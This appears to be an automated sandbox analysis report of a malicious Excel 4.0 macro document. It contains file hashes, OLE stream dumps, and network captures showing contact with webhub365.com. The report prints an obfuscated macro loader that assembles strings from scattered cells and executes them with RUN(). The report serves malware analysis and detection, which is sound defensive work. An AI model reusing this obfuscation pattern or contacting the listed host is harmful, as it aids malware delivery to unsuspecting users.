                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):44544
                                                                                                                                                            Entropy (8bit):6.190125674423799
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:AAMBmP3+XxLKZ/XMsQt1TZPImKXPXtE6MayeDkX0PmfkPchaDPfsRi7P4QG64iuU:UsP3+XxLKZ/XMsQt1TZPImKXPdfDkXSZ
                                                                                                                                                            MD5:CE639EB63B7C1C1EC94651B65CCEC383
                                                                                                                                                            SHA1:B92544ED405C33F2DB64A0BCA41646CB712E246B
                                                                                                                                                            SHA-256:2D2EAD13B2796AD58D070DC1FD36961866F25E1E436661C760A879EAC35982F9
                                                                                                                                                            SHA-512:66E841C9DF0D17AB1A1C866A96769AD0F4F8329C94EDB2917648FB4FF76E7A47C479A60A0D05293136843EC5BA938B0CEB96190BEE01AE049A467BDA45CB4566
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                            • Filename: document-47-2637.xls, Detection: malicious, Browse
                                                                                                                                                            • Filename: document-37-1849.xls, Detection: malicious, Browse
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h.\D,.2.,.2.,.2.C.1.(.2.C.6.9.2.C.7./.2.C.3.=.2.,.3...2.C.;.:.2.C...-.2.C.0.-.2.Rich,.2.........PE..L.....]......................*......@.............@.......................................@...... ...................................................................+..T............................................................................text.............................. ..`.data...h...........................@....idata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Windows User, Last Saved By: Windows User, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jun 2 14:40:34 2021, Last Saved Time/Date: Wed Jun 2 14:40:36 2021, Security: 1
                                                                                                                                                            Entropy (8bit):7.59086745125602
                                                                                                                                                            TrID:
                                                                                                                                                            • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                            File name:document-47-2637.xls
                                                                                                                                                            File size:92165
                                                                                                                                                            MD5:92dcc47a1a044fc3a2328ec6eef3918b
                                                                                                                                                            SHA1:6f9266a6c0b702cbaa0a3583df5c8cd1357eae35
                                                                                                                                                            SHA256:ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988
                                                                                                                                                            SHA512:fcd4b7c0a4e0f785604f40e0a9a4690e9b642223ee63088c6c4acfc262a18f5a79c77ab82498b422b229eaecc9a2e745b7e455c43ad2a85794e7adbac6b9bafd
                                                                                                                                                            SSDEEP:1536:Lc2ZSmXWCQnp2c90Hg+j8z3kVfKIDVzoFGUslIB54N+wl8MYBzaVt4J5aukGqu:LXZxXTQ8hHgNQNeF3V4NvuhBzaV+J5a+
                                                                                                                                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                            Static OLE Info

                                                                                                                                                            General

                                                                                                                                                            Document Type:OLE
                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                            OLE File "document-47-2637.xls"

                                                                                                                                                            Indicators

                                                                                                                                                            Has Summary Info:True
                                                                                                                                                            Application Name:Microsoft Excel
                                                                                                                                                            Encrypted Document:True
                                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                                            Contains Workbook/Book Stream:True
                                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                            Flash Objects Count:
                                                                                                                                                            Contains VBA Macros:False

                                                                                                                                                            Summary

                                                                                                                                                            Code Page:1252
                                                                                                                                                            Author:Windows User
                                                                                                                                                            Last Saved By:Windows User
                                                                                                                                                            Create Time:2021-06-02 13:40:34
                                                                                                                                                            Last Saved Time:2021-06-02 13:40:36
                                                                                                                                                            Creating Application:Microsoft Excel
                                                                                                                                                            Security:1

                                                                                                                                                            Document Summary

                                                                                                                                                            Document Code Page:1252
                                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                                            Company:
                                                                                                                                                            Contains Dirty Links:False
                                                                                                                                                            Shared Document:False
                                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                                            Application Version:983040

                                                                                                                                                            Streams

                                                                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:4096
                                                                                                                                                            Entropy:0.308022095077
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . i . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a5 00 00 00
                                                                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:4096
                                                                                                                                                            Entropy:0.316312415339
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . W . . @ . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00
                                                                                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81910
                                                                                                                                                            General
                                                                                                                                                            Stream Path:Workbook
                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                            Stream Size:81910
                                                                                                                                                            Entropy:7.97723236264
                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                            Data ASCII:. . . . . . . . T 8 . . . . . . . . . . / . 6 . . . . . . . . j . . . _ . W > N . B . . [ . . . . . . D . G . . . . 9 s < D l . o . b . 3 . ^ K W . ~ . U . . . . . . . . . . . h . . . . . \\ . p . i . . v . / . . . . B . 7 r . n . S . $ . 4 f . 7 . U . . e . Y k . . . L Q . . o N . . . . $ a . 7 Q . . . u . s . X U . ^ . . . . . . K . C d . . . l . ? . & . C . . . . . . . . v . . . . . 4 ; / . . . . 6 4 = . . . . . . B . . . . I a . . . . D . . . . = . . . . # . c . . . . h . . . . . s R . . . . . . . . . .
                                                                                                                                                            Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 2f 00 36 00 01 00 01 00 01 00 02 6a df 82 8f 5f f7 57 3e 4e 18 42 a0 92 5b 1d e8 95 bd ea b2 44 89 47 13 ad c8 06 39 73 3c 44 6c 0c 6f cd 62 dc 33 7f 5e 4b 57 2e 7e e6 55 cf e1 00 02 00 b0 04 c1 00 02 00 68 a6 e2 00 00 00 5c 00 70 00 69 b6 c9 76 af 2f 14 b1 ed d6 42 f4 37 72 10 6e cc 53 fc 24 ef 34 66 18 37 82 55 80 f5 65

                                                                                                                                                            Macro 4.0 Code

                                                                                                                                                            ,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,?,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,x,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,5,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $N$84&$X$102&$K$324&$C$460&$M$83&$K$324&$N$447&$I$336&$X$102&$K$324&$X$82&$M$83&$U$271&$X$102&$V$246&$X$462,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $W$367,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($K$351),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $H$409&$H$409&$N$84&$N$84&$N$84&$N$84&$H$409,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $Y$71,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($I$385),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\,,,,,,,,,,,,,,,,,,,,,,,Z,,,,,,,,,,,,,,,,,,,,,,,,,,,,,c,,,,,,,,,,,t,,,,,,,,,,,,,,,,,,,,,,,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RETURN(FORMULA.FILL(mxUXwaSU,id9nB5my))",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,q,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,I,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,6,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,E,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $F$204&$H$481&$K$324&$N$11&$N$11&$E$78&$I$228,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $D$167,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($R$247),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                            Network Behavior

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jun 11, 2021 00:06:27.421255112 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:06:27.478616953 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:27.478701115 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:06:27.479861975 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:06:27.538413048 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:27.538866997 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:27.538923025 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:27.538950920 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:06:27.538985014 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:06:27.539036989 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:27.539073944 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:27.539180994 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:06:27.539194107 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:06:27.545403957 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:27.545488119 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:06:27.560430050 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:06:27.622329950 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:27.622442961 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:06:27.623302937 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:06:27.722176075 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:27.801678896 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:27.801772118 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:07:42.804555893 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:07:42.804584026 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:07:42.804740906 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:07:42.804788113 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:08:14.037198067 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:08:14.038058996 CEST49716443192.168.2.3198.244.146.96
                                                                                                                                                            Jun 11, 2021 00:08:14.092190027 CEST44349716198.244.146.96192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:08:14.092454910 CEST49716443192.168.2.3198.244.146.96

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jun 11, 2021 00:06:11.702044964 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:11.760623932 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:12.423217058 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:12.476452112 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:13.815809011 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:13.866977930 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:14.916023016 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:14.971484900 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:16.358946085 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:16.409419060 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:21.025928020 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:21.079080105 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:23.198029995 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:23.261420965 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:24.092327118 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:24.181787968 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:24.303061962 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:24.353502035 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:24.621697903 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:24.698167086 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:25.705683947 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:25.769946098 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:26.716443062 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:26.795233965 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:27.358728886 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:27.419373989 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:27.434504986 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:27.487027884 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:28.777640104 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:28.839839935 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:28.994000912 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:29.047103882 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:30.037847996 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:30.098191023 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:31.069005966 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:31.121495962 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:32.177925110 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:32.230151892 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:32.825553894 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:32.887362957 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:34.401581049 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:34.456387997 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:36.240473032 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:36.296987057 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:37.165254116 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:37.227543116 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:38.087740898 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:38.149424076 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:38.993654013 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:39.045334101 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:39.896867037 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:39.949982882 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:45.859194040 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:45.920584917 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:06:49.160743952 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:06:49.221359015 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:07:04.404831886 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:07:04.480596066 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:07:23.419905901 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:07:23.479816914 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:07:27.494749069 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:07:27.557991028 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:07:59.252182007 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:07:59.326735020 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                            Jun 11, 2021 00:08:00.767307997 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                            Jun 11, 2021 00:08:00.829741001 CEST53636198.8.8.8192.168.2.3

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                            Jun 11, 2021 00:06:27.358728886 CEST192.168.2.38.8.8.80x1d33Standard query (0)webhub365.comA (IP address)IN (0x0001)

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                            Jun 11, 2021 00:06:27.419373989 CEST8.8.8.8192.168.2.30x1d33No error (0)webhub365.com198.244.146.96A (IP address)IN (0x0001)

                                                                                                                                                            HTTPS Packets

                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                            Jun 11, 2021 00:06:27.545403957 CEST198.244.146.96443192.168.2.349716CN=webhub365.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Jun 08 19:53:43 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Mon Sep 06 19:53:43 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                            CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                            CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                                                                                                            Code Manipulations

                                                                                                                                                            Statistics

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Start time:00:06:22
                                                                                                                                                            Start date:11/06/2021
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                            Imagebase:0xea0000
                                                                                                                                                            File size:27110184 bytes
                                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                            Has elevated privileges:true
